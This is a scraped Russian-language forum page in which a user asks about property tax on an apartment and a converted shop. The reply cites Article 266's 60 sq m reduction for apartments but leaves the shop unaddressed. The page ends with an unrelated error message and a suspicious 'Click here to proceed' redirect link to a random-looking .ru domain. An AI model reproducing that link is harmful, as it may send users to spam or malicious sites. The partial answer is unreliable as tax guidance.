налог на недвижимость

Виктория
налог на недвижимость

если я владею квартирой площадью 69 кв. м. и магазином, который выведен из жилого фонла площадью 65 кв. м то с какой площади нужно платить налог на недвижимость?

01.27.15 9:05
Ответ: TAxer
Так, согласно  со статьей 266

Так, согласно  со статьей 266 пунктом 266. подпунктом 266.4.1.база налогообложения объекта/объектов жилой недвижимости, в том числе их частей, находящихся в собственности физического лица налогоплательщика, уменьшается для квартиры / квартир независимо от их количества на 60 кв. метров.

01.27.15 9:07
налог на недвижимость | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=gWHVSDptibmg7Po470Tx5odrqnud%2B3mZ%2FOFPUZTVdSJ6RK7Y7E3JLtId33VKY9KscwHvkhc63%2BSiTuOSEiKKVx3xJK8GbMSFb9HRgpuNesWl5htQ7IHQCaafJzi6RuL1Of%2FcCzIvYtA7hRFcB%2BKEmT7UoS9%2Bh50Ch1tnhjRP9As%3D&t=nfrm">Click here to proceed</a>. </body>